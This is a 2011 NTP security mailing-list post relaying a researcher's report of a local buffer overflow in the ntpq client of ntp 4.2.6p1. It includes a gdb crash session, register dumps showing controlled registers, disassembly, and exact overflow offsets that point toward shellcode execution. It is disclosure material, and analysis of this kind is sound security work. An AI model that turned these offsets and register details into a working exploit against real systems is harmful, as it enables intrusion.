[ntp:security] crashreport.txt in plain text (Linux NTP query v4.2.6p1 local buffer overflow vulnerability)

Steve Kostecke kostecke at ntp.org
Mon Mar 14 11:14:51 UTC 2011


Linux NTP query v4.2.6p1 local buffer overflow vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
vendor: http://www.ntp.org/
software: http://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.6p1.tar.gz
impact: minor/informational

There is a local buffer overflow in the ntpq client that comes packaged with ntp. 
Note: The binary is NOT suid/guid enabled and is not compiled with guard stack. Nonetheless,
this bug provides some fun/interesting analysis.

mr_me at pluto ~]$ yum list installed | grep ntp
fontpackages-filesystem.noarch   1.44-1.fc13             @updates               
ntp.i686                         4.2.6p1-2.fc13          @updates               
ntpdate.i686                     4.2.6p1-2.fc13          @updates               

[mr_me at pluto ~]$ /usr/sbin/ntpq --version
ntpq - standard NTP query program - Ver. 4.2.6p1

[mr_me at pluto ~]$ gdb /usr/sbin/ntpq 
GNU gdb (GDB) Fedora (7.1-34.fc13)
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-redhat-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /usr/sbin/ntpq...(no debugging symbols found)...done.
Missing separate debuginfos, use: debuginfo-install ntp-4.2.6p1-2.fc13.i686
(gdb) r
Starting program: /usr/sbin/ntpq 
[Thread debugging using libthread_db enabled]
ntpq> AAAA {0x4ac} AAAABBBBAAAACCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..
***Command `AAAA {0x4ac} AAAABBBBAAAACCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. 'unknown

Program received signal SIGSEGV, Segmentation fault.
0xb7fab60d in el_gets () from /usr/lib/libedit.so.0
(gdb) i r
eax            0xbffff32c	-1073745108
ecx            0x0	0
edx            0x42424242	1111638594	< ---- full control
ebx            0xb7fc5ac0	-1208198464
esp            0xbffff260	0xbffff260
ebp            0xbffff2c8	0xbffff2c8
esi            0x43434343	1128481603	< ---- full control
edi            0xbffff32c	-1073745108
eip            0xb7fab60d	0xb7fab60d <el_gets+45>
eflags         0x10282	[ SF IF RF ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51
(gdb) bt
#0  0xb7fab60d in el_gets () from /usr/lib/libedit.so.0
#1  0x0012c7b0 in ?? ()
#2  0x001196a3 in ?? ()
#3  0x0011978c in main ()
(gdb) disas 0xb7fab60d
Dump of assembler code for function el_gets:
   0xb7fab5e0 <+0>:	push   %ebp
   0xb7fab5e1 <+1>:	mov    %esp,%ebp
   0xb7fab5e3 <+3>:	push   %edi
   0xb7fab5e4 <+4>:	push   %esi
   0xb7fab5e5 <+5>:	lea    -0x20(%ebp),%eax
   0xb7fab5e8 <+8>:	push   %ebx
   0xb7fab5e9 <+9>:	call   0xb7fa5469
   0xb7fab5ee <+14>:	add    $0x1a4d2,%ebx
   0xb7fab5f4 <+20>:	lea    -0x5c(%esp),%esp
   0xb7fab5f8 <+24>:	mov    0xc(%ebp),%edi
   0xb7fab5fb <+27>:	test   %edi,%edi
   0xb7fab5fd <+29>:	mov    0x8(%ebp),%esi
   0xb7fab600 <+32>:	cmovne 0xc(%ebp),%eax
   0xb7fab604 <+36>:	mov    %eax,0xc(%ebp)
   0xb7fab607 <+39>:	movl   $0x0,(%eax)
=> 0xb7fab60d <+45>:	mov    0x14(%esi),%eax
   0xb7fab610 <+48>:	test   $0x2,%al
   0xb7fab612 <+50>:	je     0xb7fab6b0 <el_gets+208>
   0xb7fab618 <+56>:	mov    0x30(%esi),%edi
   0xb7fab61b <+59>:	mov    %edi,0x4(%esp)
   0xb7fab61f <+63>:	mov    %esi,(%esp)
   0xb7fab622 <+66>:	call   *0x324(%esi)
   0xb7fab628 <+72>:	cmp    $0x1,%eax
   0xb7fab62b <+75>:	mov    %eax,%ecx
   0xb7fab62d <+77>:	jne    0xb7faba50 <el_gets+1136>
   0xb7fab633 <+83>:	lea    0x1(%edi),%edx
   0xb7fab636 <+86>:	cmp    0x3c(%esi),%edx
   0xb7fab639 <+89>:	jae    0xb7fab680 <el_gets+160>
   0xb7fab63b <+91>:	mov    %edi,%eax
   0xb7fab63d <+93>:	mov    %edx,%edi
   0xb7fab63f <+95>:	testb  $0x8,0x14(%esi)
   0xb7fab643 <+99>:	jne    0xb7fab650 <el_gets+112>
   0xb7fab645 <+101>:	movzbl (%eax),%eax
   0xb7fab648 <+104>:	cmp    $0xa,%al
   0xb7fab64a <+106>:	je     0xb7fab650 <el_gets+112>
   0xb7fab64c <+108>:	cmp    $0xd,%al
---Type <return> to continue, or q <return> to quit---

I think the overflow is somewhere here in the src code (line 1436) ntpq/ntpq.c:getcmds()

getcmds(void)
{
	char *	line;
	int	count;

	ntp_readline_init(interactive ? prompt : NULL);

	for (;;) {
		line = ntp_readline(&count);
		if (NULL == line)
			break;
		docmd(line);
		free(line);
	}

	ntp_readline_uninit();
}

The code access violates at 'mov eax, dword ptr [%esi+20]'. A this point, the EAX register can be controlled
by setting a valid rw memory address into ESI. This will trigger a deference @ 0xb7fab60d to EAX and the value 
of ESI+20 will written. The offset to controlling EDX is 1204 bytes and the offset to ESI is 1212 bytes.

In summary, it is likley that the execution flow can be redirected to the desired shellcode.

~ mr_me
-- 
Steve Kostecke <kostecke at ntp.org>
NTP Public Services Project http://support.ntp.org/
Public Key at http://support.ntp.org/Users/SteveKostecke


More information about the security mailing list